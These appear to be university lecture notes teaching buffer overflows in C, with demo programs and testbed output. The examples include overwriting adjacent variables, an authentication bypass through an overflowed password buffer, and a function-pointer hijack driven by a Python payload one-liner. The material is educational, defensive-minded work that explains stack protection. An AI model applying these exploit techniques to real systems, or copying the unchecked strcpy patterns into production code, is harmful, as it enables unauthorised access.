Buffer overflow

We have mentioned that program exploitation refers to techniques that allow us to “make a program do something unexpected and not planned”. How is this possible?

Programs are complex and it is hard to foresee all possible situations;
Programming errors can be exploited to obtain unexpected behaviour;
When a program is extended to incorporate new functionalities it might happen that these introduce new breaches, since new behaviours (initially unexpected) are introduced.

In general, code does not always do only what the programmer had in mind …

Example 1: off-by-one

in OpenSSH it was discovered a ‘off-by-one’ bug

if (id < 0 || id > channel_alloc) {

instead of

if (id < 0 || id >= channel_alloc) {

This code checks that a channel id is in the expected range. The bug allowed for accessing a memory cell (through overflow that we study in this class), obtaining root privileges.

Example 2: path traversal

Microsoft IIS webserver checked the presence of ‘\’ in the file names to avoid ‘path traversals’ into disallowed directories. When the server was extended to support Unicode developers forgot to check for %5c, that corresponds to ‘\’. Translation from Unicode happened after the backslash check, so ‘path traversal’ attacks were possible.

A buffer overflow occurs when a program overruns a buffer boundary and overwrites adjacent memory. This anomaly frequently happens in C programs. C language, in fact, leaves to the programmer the responsibility of preserving data integrity: there are no checks that variables are stored in the relative allocated memory. This produces very fast programs but run-time errors, such as overflows, are possible.

Example (Overwriting variables)

The following program allocates an integer variable value and two buffers of size 8, buffer1 and buffer2. It prints the variable location and content using %p, %s and %d (plus %08x for hexadecimal format). Then the argument from the command line is copied into buffer1 (line 18). This can clearly go beyond the boundaries of buffer1 in case the argument is bigger than 8. The idea is to observe what happens. To this purpose the program prints again the location and content of the three variables.

#include <string.h>

int main(int argc, char *argv[]) {
  int value = 5;
  char buffer1[8], buffer2[8]; // buffers of size 8

  strcpy(buffer1, "one"); // copy "one" in the first buffer
  strcpy(buffer2, "two"); // copy "two" in the second buffer

  // show location and content of buffers and of variable 'value'
  printf("[BEFORE] buffer2 is at location %p and contains %s\n",buffer2, buffer2);
  printf("[BEFORE] buffer1 is at location %p and contains %s\n",buffer1, buffer1);
  printf("[BEFORE] value is at location %p and contains %d 0x%08x\n",&value, value, value);

  if (argc &gt;= 2)
    // copy first argument into buffer1 (no check on length!!)
    strcpy(buffer1, argv[1]); 

  // show again location and content to see what has happened
  printf("[AFTER] buffer2 is at location %p and contains %s\n",buffer2, buffer2);
  printf("[AFTER] buffer1 is at location %p and contains %s\n",buffer1, buffer1);
  printf("[AFTER] value is at location %p and contains %d 0x%08x\n",&value, value,value);
}

Try to execute the program passing a string of gradually increasing size. For example: ‘A’, ‘AA’, ‘AAA’, and so on.

Observe the overflow in the output:With 7 chars there’s no overflow: only buffer1 is modified:

r1x@testbed ~/Overflow $ ./overflow AAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains two
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005

With 8 chars the zero bytes terminating the string overwrites buffer2 and string two disappears:

r1x@testbed ~/Overflow $ ./overflow AAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains 
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005

With 8 more chars we fill buffer2. Notice that buffer1 seems to contain 16 chars even if it is just 8 bytes long (in fact half of it is stored over buffer2):

r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains AAAAAAAA
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAAAAAAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005

Adding one more character reaches the bottom of the stack and the program is terminated (thanks to a protection that we will study in detail):

r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains AAAAAAAAA
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAAAAAAAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005
*** stack smashing detected ***: ./overflow terminated
.....

Try to compile the program with option -fno-stack-protector and observe the difference. This option disables protection against overflows on the stack (see below).

r1x@testbed ~/Overflow $ ./overflow AAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 5 0x00000005
r1x@testbed ~/Overflow $ ./overflow AAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 0 0x00000000
r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 4276545 0x00414141
r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 1094795585 0x41414141
Segmentation fault

We notice that this time the overflow affects value instead of buffer2: with 7 chars there is no overflow. With 8 chars the value becomes 0 because the string terminator overwrites the least significant byte of the integer value (little endianness). If we add 3 more chars we can see the 0x41 appearing in the integer on the right-hand part (again little endianness). When we add an extra char the zero byte touches the end of the stack and triggers a segmentation fault error.

To understand what happens in the above example it is good to recall how programs are mapped into memory:

Without stack protector, variables typically appears on the stack as they had been pushed, i.e., in reverse order: buffer2, buffer1 and value. Thus when an overflow on buffer1 occurs, this overwrites value but not buffer2.

Stack protector rearranges the position of variables. With -fstack-protector (which is usual enabled by default) the compiler put value before any array so that it cannot be overwritten by overflows. In this specific example it also swaps the relative position of the two buffers but this may vary depending on the compiler and on the alignment of variables on the stack. The following picture illustrates:

Now that you have a better understanding of the relative position of variables you can rerun the example to observe how values are overwritten.

A first exploit: changing program flow

Overwriting variables is, per se, critical. Sometimes it can cause interesting changes in the program flow. Next example shows how this could happen and how variable rearrangement may prevent attacks.

#include 
#include 
#include 
#include 

// Check password
int check(char *pwd) {
	int auth_flag = 0; // flag is false, initially
	char pwd_buffer[16];
	
	// password is copied into a local buffer
	strcpy(pwd_buffer, pwd);
	
	if (strcmp(pwd_buffer, "itisme") == 0 )
		auth_flag = 1;
	
	return auth_flag;
}

int main(int argc, char *argv[]) {
	if (argc < 2){
		printf("Insert a Password!\n");
		exit(1);
	}
	if (check(argv[1]))
		printf("AUTHENTICATED!\n");
	else
		printf("ACCESS DENIED!\n");
}

We compile the program with no stack protector (option -fno-stack-protector) and we experiment with inputs of increasing size:

testbed$ gcc pwdcheck.c -o pwdcheck
testbed$ ./pwdcheck ciao
ACCESS DENIED!
testbed$ ./pwdcheck itisme
AUTHENTICATED!
testbed$ ./pwdcheck AAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAAAAAAAA
AUTHENTICATED!
testbed$

What is happening here? As before, if we give a string longer than the buffer we have an overflow. Next variable in memory is overwritten. In particular auth_flag, becomes different from 0 (which in C means ‘true’). Function check(argv[1]) returns true and the user is authenticated.

Let us see with gdb what is going on on the stack:

Exercise

Set stack protector on and observe that the attack is prevented. Notice the special message given by the program when a long input is given. The overflow does not overwrites the auth_flag because of the rearrangement discussed above. Moreover the program detects the overflow. We will discuss how this is possible during the next class.

More examples

Simple overflow

The following code illustrates a simple overflow on static variables. This is discussed in the slides and is not prevented by the stack protector (which does not rearrange static variables)

#include 
#include 

int value;
char buffer1[8], buffer2[8]; // buffers of size 8

void show(char *s) {
	printf("[%s] buffer2 is at location %p and contains %s\n",s, buffer2, buffer2);
	printf("[%s] buffer1 is at location %p and contains %s\n",s, buffer1, buffer1);
	printf("[%s] value is at location %p and contains %d 0x%08x\n",s, &value, value, value);
}
int main(int argc, char *argv[]) {
	value=5;
	strcpy(buffer1, "one"); // copy "one" in the first buffer
	strcpy(buffer2, "two"); // copy "two" in the second buffer

	// show location and content of buffers and of variable 'value'
	show("BEFORE");

	if (argc >= 2)
		// copy first argument into buffer1 (no check on length!!)
		strcpy(buffer2, argv[1]); 

	// show again location and content to see what has happened
	show("AFTER");
}

Its stack counterpart is:

#include 
#include 

void show(char *s, char *buffer1, char *buffer2, int *value) {
	printf("[%s] buffer2 is at location %p and contains %s\n",s, buffer2, buffer2);
	printf("[%s] buffer1 is at location %p and contains %s\n",s, buffer1, buffer1);
	printf("[%s] value is at location %p and contains %d 0x%08x\n",s, value, *value, *value);
}
int main(int argc, char *argv[]) {
	int value;
	char buffer1[8], buffer2[8]; // buffers of size 8

	value=5;
	strcpy(buffer1, "one"); // copy "one" in the first buffer
	strcpy(buffer2, "two"); // copy "two" in the second buffer

	// show location and content of buffers and of variable 'value'
	show("BEFORE",buffer1,buffer2,&value);

	if (argc >= 2)
		// copy first argument into buffer1 (no check on length!!)
		strcpy(buffer2, argv[1]); 

	// show again location and content to see what has happened
	show("AFTER",buffer1,buffer2,&value);
}

which protects value by default through stack protector. It is the same as the example discussed above in the notes but the copy is done on buffer2 instead of buffer1

Password checking with static variables

This is the same as the password checking example discussed above, but the buffer and the flag are static. The overflow is possible independently of the stack protector.

#include 
#include 
#include 
#include 
 
char buffer[16];
int flag; 

// Check password
void check(char *pwd) {

	// password is copied into a local buffer
	strcpy(buffer, pwd); // possible overflow!!!
	
	if (strcmp(buffer, "itisme") == 0 )
		flag = 1;
}
 
int main(int argc, char *argv[]) {
	if (argc < 2){
		printf("Insert a Password!\n");
		exit(1);
	}
	flag=0; // false
	check(argv[1]); // check password
	if (flag)
		printf("AUTHENTICATED!\n");
	else
		printf("ACCESS DENIED!\n");
}

Overflow of a function pointer

This is the example discussed in the slides. A buffer overflow can overwrite a function address that is invoked by the program. This allows for jumping to arbitrary code in the program:

#include 
#include 
typedef struct element {
	char buffer[16];
	void (*process)(char *);
} element_t;

void secret_function() {
	printf("Will never reach this function!\n");
}

void show_element(char *s) {
	printf("%s\n",s);
}

int main(int argc, char *argv[]) {
	element_t e;

	e.process=show_element;
	if (argc >= 2)
		// copy first argument into buffer (no check on length!!)
		strcpy(e.buffer, argv[1]); 
	e.process(e.buffer);

}

It is possible to jump to secret_function by first looking for its address and then injecting it (little endian) after 16 A’s, so to overwrite process pointer:

r1x@testbed ~/Overflow $ objdump -D overflow-struct  | grep secret
0804849a :
r1x@testbed ~/Overflow $ ./overflow-struct $( python -c "print('A'*16 + '\x9a\x84\x04\x08')"  )
Will never reach this function!
r1x@testbed ~/Overflow $ ./overflow-struct $( python3 -c "import sys;sys.stdout.buffer.write(b'A'*16 + b'\x9a\x84\x04\x08')"  )
Will never reach this function!

Notice that in python3 it is necessary to use sys.stdout.buffer.write to write bytes.